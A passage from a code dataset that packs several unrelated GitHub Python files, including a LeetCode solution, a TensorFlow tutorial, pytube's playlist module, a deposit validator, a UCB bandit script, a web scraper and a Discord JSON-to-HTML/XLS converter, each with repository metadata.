else:\n times = max_len // k\n for i in range(times):\n nodes_swap = nodes[k * i:k * i + 2*k]\n if len(nodes_swap) % k == 0:\n for i in range(len(nodes_swap)):\n if i == k - 1:\n nodes_swap[-1-i].next = None\n elif i == 2*k -1:\n nodes_swap[-1-i].next = nodes_swap[-1]\n else:\n nodes_swap[-1 - i].next = nodes_swap[-2 - i]\n out_nodes.extend(nodes_swap)\n else:\n for i in range(len(nodes_swap) - len(nodes_swap) % k - 1):\n nodes_swap[-1 - i-len(nodes_swap)%k].next = nodes_swap[-2 - i-len(nodes_swap)%k]\n nodes_swap[0].next = nodes_swap[len(nodes_swap) % k + 1]\n out_nodes.extend(nodes_swap)\n return out_nodes[k-1]\n else:\n for i in range(max_len-1):\n nodes[-1-i].next = nodes[-2-i]\n nodes[0].next = None\n return nodes[1]\n elif head != None and head.next == None:\n return head\n else:\n return None\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nl1.next = l2\n# l2.next = l3\n# l3.next = l4\n# l4.next = l5\nout = reverseKGroup(l1,3)\nwhile out != None:\n print(out.val)\n out = out.next","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70120876241","text":"import tensorflow as tf\nimport numpy as np \nimport logging\n\nlogger =tf.get_logger()\nlogger.setLevel(logging.ERROR)\n\ncelsius_q = np.array([-40, -10, 0, 8, 15, 22, 38], dtype=float)\nfahrenheit_a = np.array([-40, 14, 32, 46, 59, 72, 100], dtype=float)\n\nfor i,c in enumerate(celsius_q):\n print(\"{} degrees Celsius = {} degrees Fahrenheit\".format(c, fahrenheit_a[i]))\n \nmodel = tf.keras.Sequential([tf.keras.layers.Dense(units=1,input_shape=[1])])\n#input_shape=[1] — This specifies that the input to this layer is a single value. That is, the shape is a one-dimensional array with one member. Since this is the first (and only) layer, that input shape is the input shape of the entire model. The single value is a floating point number, representing degrees Celsius.\n\n#units=1 — This specifies the number of neurons in the layer. The number of neurons defines how many internal variables the layer has to try to learn how to solve the problem (more later). Since this is the final layer, it is also the size of the model's output — a single float value representing degrees Fahrenheit. (In a multi-layered network, the size and shape of the layer would need to match the input_shape of the next layer.)\n\n\nmodel.compile(loss='mean_squared_error',optimizer=tf.keras.optimizers.Adam(0.1))\n#Loss function — A way of measuring how far off predictions are from the desired outcome. (The measured difference is called the \"loss\n\n#Optimizer function — A way of adjusting internal values in order to reduce the loss.\n\nhistory = model.fit(celsius_q, fahrenheit_a, epochs=500, verbose=False)\nprint(\"Finished training the model\")\nmodel.summary()\n\nprint(model.predict([100.0]))\n#\n#Feature: The input(s) to our model\n# Examples: An input/output pair used for training\n# Labels: The output of the model\n# Layer: A collection of nodes connected together within a neural network.\n# Model: The representation of your neural network\n# Dense and Fully Connected (FC): Each node in one layer is connected to each node in the previous layer.\n# Weights and biases: The internal variables of model\n# Loss: The discrepancy between the desired output and the actual output\n# MSE: Mean squared error, a type of loss function that counts a small number of large discrepancies as worse than a large number of small ones.\n# Gradient Descent: An algorithm that changes the internal variables a bit at a time to gradually reduce the loss function.\n# Optimizer: A specific implementation of the gradient descent algorithm. (There are many algorithms for this. In this course we will only use the “Adam” Optimizer, which stands for ADAptive with Momentum. It is considered the best-practice optimizer.)\n# Learning rate: The “step size” for loss improvement during gradient descent.\n# Batch: The set of examples used during training of the neural network\n# Epoch: A full pass over the entire training dataset\n# Forward pass: The computation of output values from input\n# Backward pass (backpropagation): The calculation of internal variable adjustments according to the optimizer algorithm, starting from the output layer and working back through each layer to the input.\n\n#\n","repo_name":"HarryTanNguyen/Deep-Learning-Tensoflow-file","sub_path":"Tensorflow_Udacity/celsius2fahrenheit.py","file_name":"celsius2fahrenheit.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24926379852","text":"# -*- coding: utf-8 -*-\n\"\"\"Module to download a complete playlist from a youtube channel.\"\"\"\nimport json\nimport logging\nimport re\nfrom collections.abc import Sequence\nfrom datetime import date\nfrom datetime import datetime\nfrom typing import Dict, Tuple\nfrom typing import Iterable\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\nfrom pytube import extract\nfrom pytube import request\nfrom pytube import YouTube\nfrom pytube.helpers import cache\nfrom pytube.helpers import install_proxy\nfrom pytube.helpers import regex_search\nfrom pytube.helpers import uniqueify\n\nlogger = logging.getLogger(__name__)\n\n\nclass Playlist(Sequence):\n \"\"\"Load a YouTube playlist with URL\"\"\"\n\n def __init__(self, url: str, proxies: Optional[Dict[str, str]] = None):\n if proxies:\n install_proxy(proxies)\n\n self.playlist_id = extract.playlist_id(url)\n\n self.playlist_url = (\n f\"https://www.youtube.com/playlist?list={self.playlist_id}\"\n )\n self.html = request.get(self.playlist_url)\n\n def _paginate(\n self, until_watch_id: Optional[str] = None\n ) -> Iterable[List[str]]:\n \"\"\"Parse the video links from the page source, yields the /watch?v=\n part from video link\n\n :param until_watch_id Optional[str]: YouTube Video watch id until\n which the playlist should be read.\n\n :rtype: Iterable[List[str]]\n :returns: Iterable of lists of YouTube watch ids\n \"\"\"\n req = self.html\n videos_urls, continuation = self._extract_videos(\n json.dumps(extract.initial_data(self.html))\n )\n if until_watch_id:\n try:\n trim_index = videos_urls.index(f\"/watch?v={until_watch_id}\")\n yield videos_urls[:trim_index]\n return\n except ValueError:\n pass\n yield videos_urls\n\n # Extraction from a playlist only returns 100 videos at a time\n # if self._extract_videos returns a continuation there are more\n # than 100 songs inside a playlist, so we need to add further requests\n # to gather all of them\n if continuation:\n load_more_url, headers = self._build_continuation_url(continuation)\n else:\n load_more_url, headers = None, None\n\n while load_more_url and headers: # there is an url found\n logger.debug(\"load more url: %s\", load_more_url)\n # requesting the next page of videos with the url generated from the\n # previous page\n req = request.get(load_more_url, extra_headers=headers)\n # extract up to 100 songs from the page loaded\n # returns another continuation if more videos are available\n videos_urls, continuation = self._extract_videos(req)\n if until_watch_id:\n try:\n trim_index = videos_urls.index(f\"/watch?v={until_watch_id}\")\n yield videos_urls[:trim_index]\n return\n except ValueError:\n pass\n yield videos_urls\n\n if continuation:\n load_more_url, headers = self._build_continuation_url(\n continuation\n )\n else:\n load_more_url, headers = None, None\n\n @staticmethod\n def _build_continuation_url(continuation: str) -> Tuple[str, dict]:\n \"\"\"Helper method to build the url and headers required to request\n the next page of videos\n\n :param str continuation: Continuation extracted from the json response\n of the last page\n :rtype: Tuple[str, dict]\n :returns: Tuple of an url and required headers for the next http\n request\n \"\"\"\n return (\n (\n f\"https://www.youtube.com/browse_ajax?ctoken=\"\n f\"{continuation}&continuation={continuation}\"\n ),\n {\n \"X-YouTube-Client-Name\": \"1\",\n \"X-YouTube-Client-Version\": \"2.20200720.00.02\",\n },\n )\n\n @staticmethod\n def _extract_videos(raw_json: str) -> Tuple[List[str], Optional[str]]:\n \"\"\"Extracts videos from a raw json page\n\n :param str raw_json: Input json extracted from the page or the last\n server response\n :rtype: Tuple[List[str], Optional[str]]\n :returns: Tuple containing a list of up to 100 video watch ids and\n a continuation token, if more videos are available\n \"\"\"\n initial_data = json.loads(raw_json)\n try:\n # this is the json tree structure, if the json was extracted from\n # html\n section_contents = initial_data[\"contents\"][\n \"twoColumnBrowseResultsRenderer\"][\n \"tabs\"][0][\"tabRenderer\"][\"content\"][\n \"sectionListRenderer\"][\"contents\"]\n try:\n # Playlist without submenus\n important_content = section_contents[\n 0][\"itemSectionRenderer\"][\n \"contents\"][0][\"playlistVideoListRenderer\"]\n except (KeyError, IndexError, TypeError):\n # Playlist with submenus\n important_content = section_contents[\n 1][\"itemSectionRenderer\"][\n \"contents\"][0][\"playlistVideoListRenderer\"]\n videos = important_content[\"contents\"]\n except (KeyError, IndexError, TypeError):\n try:\n # this is the json tree structure, if the json was directly sent\n # by the server in a continuation response\n important_content = initial_data[1]['response']['onResponseReceivedActions'][\n 0\n ]['appendContinuationItemsAction']['continuationItems']\n videos = important_content\n except (KeyError, IndexError, TypeError) as p:\n print(p)\n return [], None\n\n try:\n continuation = videos[-1]['continuationItemRenderer'][\n 'continuationEndpoint'\n ]['continuationCommand']['token']\n videos = videos[:-1]\n except (KeyError, IndexError):\n # if there is an error, no continuation is available\n continuation = None\n\n # remove duplicates\n return (\n uniqueify(\n list(\n # only extract the video ids from the video data\n map(\n lambda x: (\n f\"/watch?v=\"\n f\"{x['playlistVideoRenderer']['videoId']}\"\n ),\n videos\n )\n ),\n ),\n continuation,\n )\n\n def trimmed(self, video_id: str) -> Iterable[str]:\n \"\"\"Retrieve a list of YouTube video URLs trimmed at the given video ID\n\n i.e. if the playlist has video IDs 1,2,3,4 calling trimmed(3) returns\n [1,2]\n :type video_id: str\n video ID to trim the returned list of playlist URLs at\n :rtype: List[str]\n :returns:\n List of video URLs from the playlist trimmed at the given ID\n \"\"\"\n for page in self._paginate(until_watch_id=video_id):\n yield from (self._video_url(watch_path) for watch_path in page)\n\n @property # type: ignore\n @cache\n def video_urls(self) -> List[str]:\n \"\"\"Complete links of all the videos in playlist\n\n :rtype: List[str]\n :returns: List of video URLs\n \"\"\"\n return [\n self._video_url(video)\n for page in list(self._paginate())\n for video in page\n ]\n\n @property\n def videos(self) -> Iterable[YouTube]:\n \"\"\"Yields YouTube objects of videos in this playlist\n\n :Yields: YouTube\n \"\"\"\n yield from (YouTube(url) for url in self.video_urls)\n\n def __getitem__(self, i: Union[slice, int]) -> Union[str, List[str]]:\n return self.video_urls[i]\n\n def __len__(self) -> int:\n return len(self.video_urls)\n\n def __repr__(self) -> str:\n return f\"{self.video_urls}\"\n\n @property\n @cache\n def last_updated(self) -> Optional[date]:\n date_match = re.search(\n r\"Last updated on (\\w{3}) (\\d{1,2}), (\\d{4})\", self.html\n )\n if date_match:\n month, day, year = date_match.groups()\n return datetime.strptime(\n f\"{month} {day:0>2} {year}\", \"%b %d %Y\"\n ).date()\n return None\n\n @property\n @cache\n def title(self) -> Optional[str]:\n \"\"\"Extract playlist title\n\n :return: playlist title (name)\n :rtype: Optional[str]\n \"\"\"\n pattern = r\"(.+?)\"\n return regex_search(pattern, self.html, 1).replace(\"- YouTube\", \"\").strip()\n\n @staticmethod\n def _video_url(watch_path: str):\n return f\"https://www.youtube.com{watch_path}\"\n","repo_name":"manuanish/YoutubeDownloader","sub_path":"venv/Lib/site-packages/pytube/contrib/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"391495175","text":"import datetime\n\n\ndeposite_schema = {\n 'amount': {\n 'type': int, \n 'constrains': lambda val: val >= 10e3 and val <= 3e6,\n 'constrains_description': 'От 10 000 до 3 000 000'\n },\n 'periods': {\n 'type': int,\n 'constrains': lambda val: val >= 1 and val <= 60,\n 'constrains_description': 'От 1 до 60'\n },\n 'rate': {\n 'type': int,\n 'constrains': lambda val: val >= 1 and val <= 8,\n 'constrains_description': 'От 1 до 8'\n },\n 'date': {\n 'type': datetime.date,\n 'constrains': lambda val: val.day >=28 and val.day <= 31, # Наверное дата должна быть последней в месяце\n 'constrains_description': 'Дата должна быть последним днём месяца'\n }\n}\n\n\ndef assert_err_to_false(func):\n '''AssertionError подменятеся на False'''\n def wrapper(req_json):\n try:\n return func(req_json)\n\n except AssertionError as e:\n return e.args[-1]\n\n except (ValueError, TypeError): # От невалидных дат\n return f'Поле \"date\" не соответствует формату \"dd.mm.YYYY\"'\n\n return wrapper\n\n\n@assert_err_to_false\ndef validate_deposite(req_json: dict) -> str:\n '''Валидация наличия обязательных полей; типов полей; ограничений значений\n Возвращает:\n True - Если валидация пройдена\n str - Сообщение о причинах ошибки\n Обрабатываются декортаром:\n При AssertionError возвращается только текст ошибки\n ValueError может возникнуть при преобразовании строки в datetime'''\n\n temp_json = dict( # Являются ли лишние поля ошибкой?\n filter(lambda x: x[0] in deposite_schema, req_json.items()) # А если удалённые поля будут нужны для дальнейшей обратки?\n ) # Поэтому создаётся и фильтруется копия, а не исходный запрос\n\n assert temp_json.keys() == deposite_schema.keys(), \\\n f'Переданы не все обязательные параметры, не хватает следующих: {set(temp_json) ^ set(deposite_schema)}'\n\n # Преобразование даты в объект, может вызвать ValueError - ловится декоратором как ошибка валидации\n req_json['date'] = datetime.datetime.strptime(temp_json['date'], '%d.%m.%Y').date() # Происходит именно после проверки что ключ date есть в запросе\n temp_json['date'] = req_json['date']\n\n for key in temp_json.keys():\n\n assert isinstance(temp_json[key], deposite_schema[key]['type']), \\\n f'Поле {key} должно быть типа {deposite_schema[key][\"type\"]}'\n\n assert deposite_schema[key]['constrains'](temp_json[key]), \\\n f'Поле {key} выходит за ограничения - {deposite_schema[key][\"constrains_description\"]}'\n\n return True\n","repo_name":"Kronars/deposite_calc","sub_path":"app/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12129573721","text":"from my_model import Maze\nfrom UCB import UCBTable\nfrom spinup.utils.logx import EpochLogger\n\n#before main loop of UCB, each bandit should be chosen for once, and do not increase T in this time\nlogger = EpochLogger()\n# logger.save_config(locals())\n\ndef learn_init(RL):\n for action in RL.actions:\n print(RL.actions)\n # initial observation each time\n observation = env.reset()\n env.render()\n observation_, reward, done = env.step(action)\n\n # RL learn from this transition\n RL.learn(str(observation), action, reward, str(observation_),init = True)\n\n # swap observation, in tradition MAB, they are the same\n observation = observation_\n pass\n\ndef update():\n for episode in range(100):\n # initial observation\n observation = env.reset()\n\n while True:\n # fresh env\n env.render()\n\n # RL choose action based on observation\n action = RL.choose_action(str(observation))\n\n # RL take action and get next observation and reward\n observation_, reward, done = env.step(action)\n\n # RL learn from this transition\n RL.learn(str(observation), action, reward, str(observation_))\n\n # swap observation\n observation = observation_\n \n #['u', 'd', 'l', 'r'] = [0,1,2,3]\n logger.store(UCBmax=RL.UCBtable[RL.max_index])\n logger.store(ut_d=RL.actions_table[1][1]/RL.actions_table[1][0])\n logger.store(ut_u=RL.actions_table[0][1]/RL.actions_table[0][0])\n logger.store(ut_l=RL.actions_table[2][1]/RL.actions_table[2][0])\n logger.store(ut_r=RL.actions_table[3][1]/RL.actions_table[3][0])\n # break while loop when end of this episode\n if done:\n break\n\n # end of game\n logger.log_tabular('UCBmax', with_min_and_max=True)\n logger.log_tabular('ut_d', with_min_and_max=True)\n logger.log_tabular('ut_u', with_min_and_max=True)\n logger.log_tabular('ut_l', with_min_and_max=True)\n logger.log_tabular('ut_r', with_min_and_max=True)\n logger.dump_tabular()\n print('game over')\n env.destroy()\n\n#ucb learn\n#UCB WILL FOREVER CHANGED TO THESE UNEXplored ,because of the increase of t\nif __name__ == \"__main__\":\n env = Maze()\n RL = UCBTable(actions=list(range(env.n_actions)))\n learn_init(RL)\n\n env.after(50, update)\n env.mainloop()\n","repo_name":"lanpokn/UCB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37434554358","text":"#*-* coding: utf-8 *-*\r\nimport urllib.request\r\nimport re\r\nheaders = {}\r\nheaders['User-Agent'] = \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0\"\r\n \r\nreq = urllib.request.Request('https://proufu.ru/', headers = headers)\r\nhtml = urllib.request.urlopen(req).read()\r\nhtml = html.decode('utf-8')\r\n\r\nparagraphs = re.findall(r'

    (.*?)

    ',str(html))\r\n\r\nfor html1 in paragraphs:\r\n print(html1)\r\n","repo_name":"planprm/parserpython","sub_path":"webparser.py","file_name":"webparser.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6872111456","text":"import sys\nfor line in sys.stdin:\n nums = line[:-1].split('.')\n if len(nums) > 1:\n zs, xs = nums[0], nums[1][:2]\n else:\n zs, xs = nums[0], '00'\n\n negative = False\n if zs.startswith('-'):\n negative = True\n zs = zs[1:]\n if(len(zs) == 0):\n zs = '0'\n if len(zs) > 3:\n zslist = []\n zs = zs[::-1]\n for i in range(1 + len(zs) // 3):\n zslist.append(zs[3*i:3*i+3])\n zs = ','.join(zslist)[::-1]\n if zs.startswith(','):\n zs = zs[1:]\n\n if len(xs) < 2:\n xs += '0'\n\n if negative:\n print('(${}.{})'.format(zs,xs))\n else:\n print('${}.{}'.format(zs,xs))","repo_name":"AiRanthem/Algorithm-Course","sub_path":"货币规范化.py","file_name":"货币规范化.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"29735091170","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 2 10:46:55 2017\nRosalind exercise \"Counting Point Mutations\"\n@author: evelina\n\"\"\"\n\nimport sys\ntest = False\n\n# Define the input\nif test == True:\n # Use the sample FASTA file\n infile = open('sample.txt','r')\nelse:\n # Read the download FASTA file\n infile_name = sys.argv[1]\n infile = open(infile_name,'r')\n# extract two sequenc strings\nline_count = 0\nfor line in infile:\n line = line.strip('\\n')\n if line_count == 0:\n seq_a = line\n else:\n seq_b = line\n line_count += 1\n\n# Create a function to calculate the differnce count in two sequences\ndef cal_dif(seq1,seq2):\n dif_counts = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n dif_counts += 1\n return(dif_counts)\n\n# Calculate the difference from file\ndif_num = cal_dif(seq_a,seq_b)\nprint(dif_num)\n ","repo_name":"Hz-Lin/wur_bioinfomatics","sub_path":"Advanced_Bioinformatics/week12_python/r06_Counting_Point_Mutations/CPM.py","file_name":"CPM.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36050476802","text":"import sys, os, json\r\nimport pandas as pd\r\nfrom json2html import *\r\n\r\nloop = 1\r\ncount = 0\r\ncheckerrors = 0\r\n\r\nprint(\"Convert JSON Discord chats to HTML or XLS\")\r\nprint()\r\nprint(\"https://abrignoni.blogspot.com\")\r\nprint(\"Twitter: @AlexisBrignoni\")\r\nprint()\r\n\r\nwhile loop == 1:\r\n\tprint (\"Write path to files: \")\r\n\tpath2input = input()\r\n\tif os.path.exists(path2input):\r\n\t\t#print (\"Directory exists -> \"+path2input)\r\n\t\tloop = 2\r\n\telse:\r\n\t\tprint (\"Directory does not exist.\")\r\n\r\nwhile loop == 2:\r\n\tprint()\r\n\tprint (\"Select conversion format:\")\r\n\tprint (\"1: HTML\")\r\n\tprint (\"2: XLS\")\r\n\tselected = input()\r\n\tif (selected == \"1\"):\r\n\t\tloop = 3\r\n\t\tprint()\r\n\t\tprint (\"HTML selected\")\r\n\t\tprint()\r\n\t\t\r\n\telif (selected == \"2\"):\r\n\t\tprint()\r\n\t\tprint (\"XLS selected\")\r\n\t\tprint()\r\n\t\tloop = 3\r\n\telse:\r\n\t\tprint (\"Invalid selection.\")\r\n\t\t\r\n\r\nif (selected == \"2\"):\r\n\t# open folder to write to\r\n\tos.makedirs(path2input + \"/\" + \"converted-XLS\" + \"/\")\r\n\t#open folder to read from\r\n\tfor filename in os.listdir(path2input):\r\n\t\tcount = count+1\r\n\t\tif os.path.isdir(path2input + \"/\" + filename):\r\n\t\t\tcount=count-1 #make sure a directory check does not count as a processed file.\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tfile = open(path2input + \"/\" + filename, 'r')\r\n\t\t\t\tinput = file.read() \r\n\t\t\t\tfile.close()\r\n\t\t\t\tdata = pd.read_json(input)\r\n\t\t\t\tdata.to_excel(path2input + \"/\" + \"converted-XLS\" + \"/\" + filename +'.xls', index=False)\r\n\t\t\texcept:\r\n\t\t\t\tcheckerrors = 1;\r\n\t\t\t\tprint(\"Unable to convert: \"+ path2input + '/' + filename)\r\n\t\t\t\terrors = open(path2input + \"/converted-XLS/error.txt\", 'a')\r\n\t\t\t\terrors.write(\"Unable to convert: \"+ path2input + '/' + filename + '\\n')\r\n\t\t\t\terrors.close()\t\t\r\n\t\t\t\tpass\r\n\t\t\t\r\nif (selected == \"1\"):\r\n\tos.makedirs(path2input + \"/\" + \"converted-HTML\" + \"/\")\r\n\tfor filename in os.listdir(path2input):\r\n\t\tcount = count+1\r\n\t\tif os.path.isdir(path2input + \"/\" + filename):\r\n\t\t\tcount=count-1 \r\n\t\telse:\n\t\t\ttry:\n\t\t\t\tfile = open(path2input + \"/\" + filename, 'r', encoding=\"utf-8\")\n\t\t\t\tinput = file.read() \n\t\t\t\tfile.close()\n\t\t\t\t\t\n\t\t\t\tafuera = json2html.convert(json = input, clubbing = False)\n\n\t\t\t\tfile = open(path2input + \"/\" + \"converted-HTML\" + \"/\" + filename +'.html', 'w', encoding=\"utf-8\")\n\t\t\t\tfile.write(afuera)\n\t\t\t\tfile.close()\n\t\t\texcept:\n\t\t\t\tprint(f'The {filename} file is not a valid json object')\n\t\t\t\tcount=count-1\n\r\nprint()\r\nprint(\"Files processed: \"+ str(count))\r\nprint()\r\n\r\nif (checkerrors == 1):\r\n\tprint(\"See error log: \"+ path2input + \"/\" + \"converted-XLS\" + \"/errors.txt\" + \". Process as HTML to view contents of these files.\" )\r\n\t \r\n\r\nif (selected == \"2\"):\r\n\tprint()\r\n\tprint(\"Converted files located at: \" + path2input + \"/\" + \"converted-HTML\" + \"/\")\r\n\tprint()\r\n\tprint(\"Script will now close.\")\r\n\tos.system('pause')\r\n\r\nif (selected == \"1\"):\r\n\tprint()\r\n\tprint(\"Converted files located at: \" + path2input + \"/\" + \"converted-XLS\" + \"/\")\r\n\tprint()\r\n\tprint(\"Script will now close.\")\r\n\tos.system('pause')\r\n","repo_name":"abrignoni/JSON-to-HTML-and-XLS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"23962020395","text":"from classes.web.pages.Evaluationweb import Evaluationweb\nfrom miscellaneous.Misc import Misc\n\nGRADES_TABLE_ID = 'taula_38956696119'\nGRADE_ROWS_XPATH = './/tr[contains(@class,\"td\")]'\nGRADES_INPUT_XPATH = \".//input[@type='text']\"\nGRADES_SELECT_XPATH = \".//option[@selected='selected']\"\nHOURS_XPATH = './/b'\n\nclass StudentGradesWeb(Evaluationweb):\n\n def get_grade_from_cell(self,cell):\n grade_element = self.get_element_inside_element_by_xpath(cell,GRADES_INPUT_XPATH)\n if grade_element: return grade_element.get_attribute(\"value\")\n else: grade_element = self.get_element_inside_element_by_xpath(cell,GRADES_SELECT_XPATH)\n if grade_element: return grade_element.get_attribute(\"value\")\n else: return 0\n\n def get_hours_from_cell(self,cell):\n hours_cell = self.get_element_inside_element_by_xpath(cell,HOURS_XPATH)\n if (hours_cell) and Misc.try_parse(hours_cell.text): return int(hours_cell.text)\n else: return 0\n\n def get_grades_matrix(self):\n table = self.search_by_ID(GRADES_TABLE_ID)\n grade_rows = self.get_elements_inside_element_by_xpath(table,GRADE_ROWS_XPATH)\n if not grade_rows: raise Exception(\"Not grades in this screen\")\n grades = []\n for row in grade_rows:\n cells = self.get_row_data_cells(row)\n if not cells: raise Exception(\"Row without cells\")\n grades.append([cells[1].text,self.get_grade_from_cell(cells[3]),self.get_hours_from_cell(cells[2])])\n return grades","repo_name":"mlvillarroya/saga_grades_extract","sub_path":"classes/web/pages/StudentGradesWeb.py","file_name":"StudentGradesWeb.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29314173347","text":"import torch\n\nimport numpy as np\n\n\ndef get_lr_policy(lr_schedule):\n \"\"\"Implement a new schduler directly in this file. \n Args should contain a single choice for learning rate scheduler.\"\"\"\n\n d = {\n \"cosine\": cosine_schedule,\n \"step\": step_schedule,\n \"cubic\": cubic_schedule,\n }\n return d[lr_schedule]\n\n\ndef get_optimizer(model, args):\n if args.optimizer == \"sgd\":\n optim = torch.optim.SGD(\n model.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.wd,\n )\n elif args.optimizer == \"adam\":\n optim = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd,)\n elif args.optimizer == \"rmsprop\":\n optim = torch.optim.RMSprop(\n model.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.wd,\n )\n else:\n print(f\"{args.optimizer} is not supported.\")\n sys.exit(0)\n return optim\n\n\ndef new_lr(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef cubic_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n cos_step = step - warmup_step\n a = lr * (1 - cos_step / total_step) ** 3\n\n new_lr(optimizer, a)\n\n return set_lr\n\n\ndef cosine_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_cosine_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n cos_step = step - warmup_step\n a = lr * 0.5 * (1 + np.cos(cos_step / total_cosine_step * np.pi))\n\n new_lr(optimizer, a)\n\n return set_lr\n\n\ndef step_schedule(optimizer, args):\n def set_lr(step, step_per_epoch, lr=args.lr):\n warmup_step = args.warmup_epochs * step_per_epoch\n total_step = (args.epochs - args.warmup_epochs) * step_per_epoch\n\n if step < warmup_step:\n a = lr * step / warmup_step\n else:\n a = lr\n if step >= 0.5 * total_step:\n a *= 0.1\n if step >= 0.75 * total_step:\n a *= 0.01\n\n new_lr(optimizer, a)\n\n return set_lr\n","repo_name":"NormalUhr/hydra-structured","sub_path":"utils/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"11392199066","text":"import cv2\nimport time\nimport numpy as np\n\nclass CalibracionHomografia():\n def __init__(self, archivoProyector, imgCamera): \n self.imgProy = cv2.imread(archivoProyector)\n self.imgCamera = imgCamera.copy()\n self.heightProy, self.widthProy, _ = self.imgProy.shape\n self.areaProy = self.heightProy*self.heightProy\n self.pts = []\n self.ptos_proj =np.array([[0, 0],[0,self.heightProy],[self.widthProy,self.heightProy],[self.widthProy,0]])\n def CrearMascara(self, l_h, l_s, l_v,u_h, u_s, u_v):\n hsv = cv2.cvtColor(self.imgCamera, cv2.COLOR_BGR2HSV)\n l_b = np.array([l_h, l_s, l_v])\n u_b = np.array([u_h, u_s, u_v])\n mask = cv2.inRange(hsv, l_b, u_b)\n #Eliminando ruido\n kernel = np.ones((5,5))\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n return mask\n def DeteccionBordes(self, mask):\n imgCanny = cv2.Canny(mask, 0, 188)#Canny detector\n #Dilatar para mejorar la visibilidad de los bordes\n #imgDilation = cv2.dilate(imgCanny, kernel, iterations=1)\n #cv2.imshow('dil', imgDilation)\n return imgCanny\n def ObtenerPuntosHomografia(self, bordes, perc, relArea):\n self.pts = []\n time.sleep(1)\n contornos, jerarquia = cv2.findContours(bordes, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n vacio=[0,0];top_left_point=vacio;bottom_left_point=vacio;bottom_right_point=vacio;top_right_point=vacio\n imgContornos=self.imgCamera.copy()\n for i in contornos:\n cv2.drawContours(imgContornos, i,-1,(0,255,0), 2)#-1->Todos los contornos son graficados\n epsilon = perc*cv2.arcLength(i,True)/100.0\n approx = cv2.approxPolyDP(i,epsilon,True) \n x,y,w,h = cv2.boundingRect(approx)\n area=w*h\n relacion=float(area)*100/self.areaProy\n if len(approx)==4 and relacion>relArea:\n print(approx)\n cent = np.mean(approx, axis=0)\n centx=cent[0][0];centy=cent[0][1]\n #Asignando posiciones del rectangulo\n for [point] in approx:\n if point[0]centy:\n bottom_left_point=[point[0], point[1]]\n if point[0]>centx and point[1]>centy:\n bottom_right_point=[point[0], point[1]]\n if point[0]>centx and point[1] 0:\n segment_file_names = []\n\n for otpl_file in config.input_files:\n segment_file_names.extend(segment_otpl_file(otpl_file, args.segment, config.encoding))\n\n config.input_files = segment_file_names\n\nsys.exit(otpl_to_text(config))\n","repo_name":"fnl/otplc","sub_path":"scripts/otpl-extractor.py","file_name":"otpl-extractor.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14566259276","text":"import time, re\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom typing import List, Tuple, Union, Optional\nfrom heapq import heappop, heappush, heapify, heappushpop, heapreplace\nfrom collections import defaultdict, deque, Counter, OrderedDict\nfrom itertools import accumulate, permutations, combinations, product, compress, zip_longest, pairwise, groupby\nfrom math import perm, comb, gcd, lcm, inf, ceil, floor, factorial, dist, sqrt\nfrom functools import cache, lru_cache, reduce\nfrom sortedcontainers import SortedList, SortedSet, SortedDict\nfrom bisect import bisect_left, bisect_right, insort, insort_left, insort_right\n\nfrom collections import Counter\n# def func():\n# n = int(input())\n# arr = list(map(lambda x: int(x, 16), input().split(\" \")))\n# bits = 